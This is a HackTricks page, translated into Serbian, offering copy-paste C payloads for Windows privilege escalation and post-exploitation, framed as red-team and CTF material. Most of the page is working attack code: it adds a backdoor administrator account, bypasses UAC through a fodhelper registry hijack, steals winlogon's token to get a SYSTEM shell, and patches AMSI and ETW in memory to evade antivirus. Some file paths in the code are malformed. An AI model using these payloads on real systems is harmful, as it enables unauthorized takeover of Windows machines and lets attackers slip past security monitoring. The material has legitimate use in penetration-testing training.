HackTricksWindows C Payloads
Reading time: 6 minutes
tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Ova stranica sakuplja male, samostalne C isječke koji su korisni tokom Windows Local Privilege Escalation ili post-exploitation. Svaki payload je dizajniran da bude pogodan za kopiranje i lepljenje, zahteva samo Windows API / C runtime i može se kompajlirati sa i686-w64-mingw32-gcc (x86) ili x86_64-w64-mingw32-gcc (x64).
⚠️ Ovi payloads pretpostavljaju da proces već ima minimalne privilegije potrebne za izvršenje akcije (npr.
SeDebugPrivilege,SeImpersonatePrivilege, ili medium-integrity context for a UAC bypass). Namenjeni su za red-team or CTF settings where exploiting a vulnerability has landed arbitrary native code execution.
Dodaj lokalnog administratorskog korisnika
// i686-w64-mingw32-gcc -s -O2 -o addadmin.exe addadmin.c
#include <stdlib.h>
int main(void) {
system("net user hacker Hacker123! /add");
system("net localgroup administrators hacker /add");
return 0;
}
UAC Bypass – fodhelper.exe Registry Hijack (Medium → High integrity)
Kada se poverljivi binarni fajl fodhelper.exe pokrene, on proverava sledeću putanju registra bez filtriranja DelegateExecute verb. Postavljanjem naše komande pod taj ključ, napadač može zaobići UAC bez upisivanja fajla na disk.
Putanja registra koju upituje fodhelper.exe
HKCU\Software\Classes\ms-settings\Shell\Open\command
Minimalni PoC koji pokreće povišeni cmd.exe:
// x86_64-w64-mingw32-gcc -municode -s -O2 -o uac_fodhelper.exe uac_fodhelper.c
#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(void) {
HKEY hKey;
const char *payload = "C:\\Windows\\System32\\cmd.exe"; // change to arbitrary command
// 1. Create the vulnerable registry key
if (RegCreateKeyExA(HKEY_CURRENT_USER,
"Software\\Classes\\ms-settings\\Shell\\Open\\command", 0, NULL, 0,
KEY_WRITE, NULL, &hKey, NULL) == ERROR_SUCCESS) {
// 2. Set default value => our payload
RegSetValueExA(hKey, NULL, 0, REG_SZ,
(const BYTE*)payload, (DWORD)strlen(payload) + 1);
// 3. Empty "DelegateExecute" value = trigger (")
RegSetValueExA(hKey, "DelegateExecute", 0, REG_SZ,
(const BYTE*)"", 1);
RegCloseKey(hKey);
// 4. Launch auto-elevated binary
system("fodhelper.exe");
}
return 0;
}
Testirano na Windows 10 22H2 i Windows 11 23H2 (zakrpe od jula 2025). Bypass i dalje radi jer Microsoft nije ispravio nedostatak provere integriteta u DelegateExecute putanji.
Pokreni SYSTEM shell dupliciranjem tokena (SeDebugPrivilege + SeImpersonatePrivilege)
Ako trenutni proces ima oba SeDebug i SeImpersonate privilegije (tipično za mnoge servisne naloge), možete ukrasti token iz winlogon.exe, duplicirati ga i pokrenuti povišen proces:
// x86_64-w64-mingw32-gcc -O2 -o system_shell.exe system_shell.c -ladvapi32 -luser32
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
DWORD FindPid(const wchar_t *name) {
PROCESSENTRY32W pe = { .dwSize = sizeof(pe) };
HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (snap == INVALID_HANDLE_VALUE) return 0;
if (!Process32FirstW(snap, &pe)) return 0;
do {
if (!_wcsicmp(pe.szExeFile, name)) {
DWORD pid = pe.th32ProcessID;
CloseHandle(snap);
return pid;
}
} while (Process32NextW(snap, &pe));
CloseHandle(snap);
return 0;
}
int wmain(void) {
DWORD pid = FindPid(L"winlogon.exe");
if (!pid) return 1;
HANDLE hProc = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
HANDLE hToken = NULL, dupToken = NULL;
if (OpenProcessToken(hProc, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &hToken) &&
DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &dupToken)) {
STARTUPINFOW si = { .cb = sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
if (CreateProcessWithTokenW(dupToken, LOGON_WITH_PROFILE,
L"C\\\\Windows\\\\System32\\\\cmd.exe", NULL, CREATE_NEW_CONSOLE,
NULL, NULL, &si, &pi)) {
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
}
if (hProc) CloseHandle(hProc);
if (hToken) CloseHandle(hToken);
if (dupToken) CloseHandle(dupToken);
return 0;
}
Za detaljnije objašnjenje kako to funkcioniše, pogledajte:
SeDebug + SeImpersonate copy token
Patč AMSI i ETW u memoriji (Defence Evasion)
Većina modernih AV/EDR motora se oslanja na AMSI i ETW da bi ispitala zlonamerna ponašanja. Patčovanjem oba interfejsa rano unutar trenutnog procesa sprečava se skeniranje payloads zasnovanih na skriptama (npr. PowerShell, JScript).
// gcc -o patch_amsi.exe patch_amsi.c -lntdll
#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>
#include <stdio.h>
void Patch(BYTE *address) {
DWORD oldProt;
// mov eax, 0x80070057 ; ret (AMSI_RESULT_E_INVALIDARG)
BYTE patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
VirtualProtect(address, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProt);
memcpy(address, patch, sizeof(patch));
VirtualProtect(address, sizeof(patch), oldProt, &oldProt);
}
int main(void) {
HMODULE amsi = LoadLibraryA("amsi.dll");
HMODULE ntdll = GetModuleHandleA("ntdll.dll");
if (amsi) Patch((BYTE*)GetProcAddress(amsi, "AmsiScanBuffer"));
if (ntdll) Patch((BYTE*)GetProcAddress(ntdll, "EtwEventWrite"));
MessageBoxA(NULL, "AMSI & ETW patched!", "OK", MB_OK);
return 0;
}
Gore navedeni patch važi samo za tekući proces; pokretanje novog PowerShell-a nakon njegove primene će se izvršiti bez AMSI/ETW inspekcije.
Kreirajte podređeni proces kao Protected Process Light (PPL)
Zatražite PPL nivo zaštite za podređeni proces pri kreiranju koristeći STARTUPINFOEX + PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL. Ovo je dokumentovan API i uspeće samo ako je ciljni image potpisan za traženu signer class (Windows/WindowsLight/Antimalware/LSA/WinTcb).
// x86_64-w64-mingw32-gcc -O2 -o spawn_ppl.exe spawn_ppl.c
#include <windows.h>
int wmain(void) {
STARTUPINFOEXW si = {0};
PROCESS_INFORMATION pi = {0};
si.StartupInfo.cb = sizeof(si);
SIZE_T attrSize = 0;
InitializeProcThreadAttributeList(NULL, 1, 0, &attrSize);
si.lpAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrSize);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrSize);
DWORD lvl = PROTECTION_LEVEL_ANTIMALWARE_LIGHT; // choose the desired level
UpdateProcThreadAttribute(si.lpAttributeList, 0,
PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL,
&lvl, sizeof(lvl), NULL, NULL);
if (!CreateProcessW(L"C\\\Windows\\\System32\\\notepad.exe", NULL, NULL, NULL, FALSE,
EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi)) {
// likely ERROR_INVALID_IMAGE_HASH (577) if the image is not properly signed for that level
return 1;
}
DeleteProcThreadAttributeList(si.lpAttributeList);
HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return 0;
}
Nivoi koji se najčešće koriste:
PROTECTION_LEVEL_WINDOWS_LIGHT(2)PROTECTION_LEVEL_ANTIMALWARE_LIGHT(3)PROTECTION_LEVEL_LSA_LIGHT(4)
Potvrdite rezultat pomoću Process Explorer/Process Hacker tako što ćete proveriti kolonu Protection.
Izvori
- Ron Bowes – “Fodhelper UAC Bypass Deep Dive” (2024)
- SplinterCode – “AMSI Bypass 2023: The Smallest Patch Is Still Enough” (BlackHat Asia 2023)
- CreateProcessAsPPL – minimal PPL process launcher: https://github.com/2x7EQ13/CreateProcessAsPPL
- Microsoft Docs – STARTUPINFOEX / InitializeProcThreadAttributeList / UpdateProcThreadAttribute
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.